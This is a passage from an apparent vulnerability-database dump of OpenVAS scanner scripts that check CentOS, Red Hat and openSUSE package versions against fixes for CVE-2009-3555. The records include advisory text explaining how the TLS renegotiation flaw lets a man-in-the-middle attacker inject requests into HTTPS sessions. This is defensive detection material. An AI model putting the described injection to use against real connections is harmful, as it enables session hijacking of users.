USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Network Security Services (NSS) is a set of libraries designed to support\n the cross-platform development of security-enabled client and server\n applications. Applications built with NSS can support SSLv2, SSLv3, TLS,\n and other security standards.\n\n Netscape Portable Runtime (NSPR) provides platform independence for non-GUI\n operating system facilities. These facilities include threads, thread\n synchronization, normal file and network I/O, interval timing, calendar\n time, basic memory management (malloc and free), and shared library\n linking.\n \n A flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\n Sockets Layer) protocols handled session renegotiation. A man-in-the-middle\n attacker could use this flaw to prefix arbitrary plain text to a client's\n session (for example, an HTTPS connection to a website). This could force\n the server to process an attacker's request as if authenticated using the\n victim's credentials. This update addresses this flaw by implementing the\n TLS Renegotiation Indication Extension, as defined in RFC 5746.\n (CVE-2009-3555)\n \n Refer to the following Knowledgebase article for additional details about\n this flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n \n Users of Red Hat Certificate System 7.3 and 8.0 should review the following\n Knowledgebase article before installing this update:\n http://kbase.redhat.com/faq/docs/DOC-28439\n \n All users of NSS are advised to upgrade to these updated packages, which\n update NSS to version 3.12.6. This erratum also updates the NSPR packages\n to the version required by NSS 3.12.6. All running applications using the\n NSS library must be restarted for this update to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"nspr on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-March/016602.html\");\n script_id(880611);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2010:0165\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"CentOS Update for nspr CESA-2010:0165 centos5 i386\");\n\n script_summary(\"Check for the Version of nspr\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~1.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-devel\", rpm:\"nspr-devel~4.8.4~1.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~1.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-devel\", rpm:\"nss-devel~3.12.6~1.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-pkcs11-devel\", rpm:\"nss-pkcs11-devel~3.12.6~1.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-tools\", rpm:\"nss-tools~3.12.6~1.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-21T11:32:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "Check for the Version of nss", "modified": "2017-12-21T00:00:00", "published": "2010-03-31T00:00:00", "id": "OPENVAS:870238", "href": "http://plugins.openvas.org/nasl.php?oid=870238", "type": "openvas", "title": "RedHat Update for nss RHSA-2010:0165-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for nss RHSA-2010:0165-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Network Security Services (NSS) is a set of libraries designed to support\n the cross-platform development of security-enabled client and server\n applications. Applications built with NSS can support SSLv2, SSLv3, TLS,\n and other security standards.\n\n Netscape Portable Runtime (NSPR) provides platform independence for non-GUI\n operating system facilities. These facilities include threads, thread\n synchronization, normal file and network I/O, interval timing, calendar\n time, basic memory management (malloc and free), and shared library\n linking.\n \n A flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\n Sockets Layer) protocols handled session renegotiation. A man-in-the-middle\n attacker could use this flaw to prefix arbitrary plain text to a client's\n session (for example, an HTTPS connection to a website). This could force\n the server to process an attacker's request as if authenticated using the\n victim's credentials. This update addresses this flaw by implementing the\n TLS Renegotiation Indication Extension, as defined in RFC 5746.\n (CVE-2009-3555)\n \n Refer to the following Knowledgebase article for additional details about\n this flaw: http://kbase.redhat.com/faq/docs/DOC-20491 \n \n Users of Red Hat Certificate System 7.3 and 8.0 should review the following\n Knowledgebase article before installing this update:\n http://kbase.redhat.com/faq/docs/DOC-28439\n \n All users of NSS are advised to upgrade to these updated packages, which\n update NSS to version 3.12.6. This erratum also updates the NSPR packages\n to the version required by NSS 3.12.6. All running applications using the\n NSS library must be restarted for this update to take effect.\";\n\ntag_affected = \"nss on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-March/msg00023.html\");\n script_id(870238);\n script_version(\"$Revision: 8205 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 07:30:37 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-31 14:20:46 +0200 (Wed, 31 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2010:0165-01\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"RedHat Update for nss RHSA-2010:0165-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of nss\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-debuginfo\", rpm:\"nspr-debuginfo~4.8.4~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-devel\", rpm:\"nspr-devel~4.8.4~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-debuginfo\", rpm:\"nss-debuginfo~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-devel\", rpm:\"nss-devel~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-pkcs11-devel\", rpm:\"nss-pkcs11-devel~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-tools\", rpm:\"nss-tools~3.12.6~1.el5_4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~1.1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-debuginfo\", rpm:\"nspr-debuginfo~4.8.4~1.1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-devel\", rpm:\"nspr-devel~4.8.4~1.1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-debuginfo\", rpm:\"nss-debuginfo~3.12.6~1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-devel\", rpm:\"nss-devel~3.12.6~1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-tools\", rpm:\"nss-tools~3.12.6~1.el4_8\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:56:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "The remote host is missing updates announced in\nadvisory SUSE-SA:2009:057.", "modified": "2017-07-11T00:00:00", "published": "2009-11-23T00:00:00", "id": "OPENVAS:66302", "href": "http://plugins.openvas.org/nasl.php?oid=66302", "type": "openvas", "title": "SuSE Security Advisory SUSE-SA:2009:057 (openssl)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sa_2009_057.nasl 6668 2017-07-11 13:34:29Z cfischer $\n# Description: Auto-generated from advisory SUSE-SA:2009:057 (openssl)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The TLS/SSLv3 protocol as implemented in openssl prior to this update\nwas not able to associate already sent data to a renegotiated connection.\nThis allowed man-in-the-middle attackers to inject HTTP requests in a\nHTTPS session without being noticed.\nFor example Apache's mod_ssl was vulnerable to this kind of attack because\nit uses openssl.\n\nIt is believed that this vulnerability is actively exploited in the wild to\nget access to HTTPS protected web-sites.\n\nPlease note that renegotiation will be disabled for any application using\nopenssl by this update and may cause problems in some cases.\nAdditionally this attack is not limited to HTTP.\";\ntag_solution = \"Update your system with the packages as indicated in\nthe referenced security advisory.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=SUSE-SA:2009:057\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SA:2009:057.\";\n\n \n\nif(description)\n{\n script_id(66302);\n script_version(\"$Revision: 6668 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:34:29 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-23 20:51:51 +0100 (Mon, 23 Nov 2009)\");\n script_cve_id(\"CVE-2009-3555\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_name(\"SuSE Security Advisory SUSE-SA:2009:057 (openssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-debuginfo\", rpm:\"compat-openssl097g-debuginfo~0.9.7g~149.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-debugsource\", rpm:\"compat-openssl097g-debugsource~0.9.7g~149.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8-debuginfo\", rpm:\"libopenssl0_9_8-debuginfo~0.9.8k~3.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~0.9.8k~3.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-debugsource\", rpm:\"openssl-debugsource~0.9.8k~3.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g\", rpm:\"compat-openssl097g~0.9.7g~149.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~0.9.8k~3.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8k~3.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8k~3.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8k~3.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-debuginfo\", rpm:\"compat-openssl097g-debuginfo~0.9.7g~146.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-debugsource\", rpm:\"compat-openssl097g-debugsource~0.9.7g~146.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~0.9.8h~28.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-debugsource\", rpm:\"openssl-debugsource~0.9.8h~28.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g\", rpm:\"compat-openssl097g~0.9.7g~146.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~0.9.8h~28.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8h~28.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8h~28.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8h~28.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-debuginfo\", rpm:\"compat-openssl097g-debuginfo~0.9.7g~119.7\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-debugsource\", rpm:\"compat-openssl097g-debugsource~0.9.7g~119.7\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~0.9.8g~47.10\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-debugsource\", rpm:\"openssl-debugsource~0.9.8g~47.10\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g\", rpm:\"compat-openssl097g~0.9.7g~119.7\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~0.9.8g~47.10\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8g~47.10\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8g~47.10\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-certs\", rpm:\"openssl-certs~0.9.8g~47.10\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8g~47.10\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-certs\", rpm:\"openssl-certs~0.9.8h~28.2.1\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-certs\", rpm:\"openssl-certs~0.9.8h~25.2.13\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-debuginfo-64bit\", rpm:\"compat-openssl097g-debuginfo-64bit~0.9.7g~146.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-64bit\", rpm:\"compat-openssl097g-64bit~0.9.7g~146.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8-64bit\", rpm:\"libopenssl0_9_8-64bit~0.9.8h~28.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-64bit\", rpm:\"compat-openssl097g-64bit~0.9.7g~119.7\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8-64bit\", rpm:\"libopenssl0_9_8-64bit~0.9.8g~47.10\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-debuginfo-32bit\", rpm:\"compat-openssl097g-debuginfo-32bit~0.9.7g~149.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8-debuginfo-32bit\", rpm:\"libopenssl0_9_8-debuginfo-32bit~0.9.8k~3.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-32bit\", rpm:\"compat-openssl097g-32bit~0.9.7g~149.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8-32bit\", rpm:\"libopenssl0_9_8-32bit~0.9.8k~3.5.3\", rls:\"openSUSE11.2\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-debuginfo-32bit\", rpm:\"compat-openssl097g-debuginfo-32bit~0.9.7g~146.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-32bit\", rpm:\"compat-openssl097g-32bit~0.9.7g~146.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8-32bit\", rpm:\"libopenssl0_9_8-32bit~0.9.8h~28.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g-32bit\", rpm:\"compat-openssl097g-32bit~0.9.7g~119.7\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8-32bit\", rpm:\"libopenssl0_9_8-32bit~0.9.8g~47.10\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-14T11:48:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "Check for the Version of openssl097a", "modified": "2017-12-14T00:00:00", "published": "2010-03-31T00:00:00", "id": "OPENVAS:870236", "href": "http://plugins.openvas.org/nasl.php?oid=870236", "type": "openvas", "title": "RedHat Update for openssl097a RHSA-2010:0164-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openssl097a RHSA-2010:0164-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\n and Transport Layer Security (TLS v1) protocols, as well as a\n full-strength, general purpose cryptography library.\n\n A flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\n Sockets Layer) protocols handled session renegotiation. A man-in-the-middle\n attacker could use this flaw to prefix arbitrary plain text to a client's\n session (for example, an HTTPS connection to a website). This could force\n the server to process an attacker's request as if authenticated using the\n victim's credentials. This update addresses this flaw by implementing the\n TLS Renegotiation Indication Extension, as defined in RFC 5746.\n (CVE-2009-3555)\n \n Refer to the following Knowledgebase article for additional details about\n this flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n \n All openssl097a users should upgrade to these updated packages, which\n contain a backported patch to resolve this issue. For the update to take\n effect, all services linked to the openssl097a library must be restarted,\n or the system rebooted.\";\n\ntag_affected = \"openssl097a on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-March/msg00022.html\");\n script_id(870236);\n script_version(\"$Revision: 8109 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-14 07:31:15 +0100 (Thu, 14 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-31 14:20:46 +0200 (Wed, 31 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2010:0164-01\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"RedHat Update for openssl097a RHSA-2010:0164-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of openssl097a\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl097a\", rpm:\"openssl097a~0.9.7a~9.el5_4.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl097a-debuginfo\", rpm:\"openssl097a-debuginfo~0.9.7a~9.el5_4.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-04T11:18:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-927-1", "modified": "2017-12-01T00:00:00", "published": "2010-04-16T00:00:00", "id": "OPENVAS:840416", "href": "http://plugins.openvas.org/nasl.php?oid=840416", "type": "openvas", "title": "Ubuntu Update for nss vulnerability USN-927-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_927_1.nasl 7965 2017-12-01 07:38:25Z santu $\n#\n# Ubuntu Update for nss vulnerability USN-927-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = 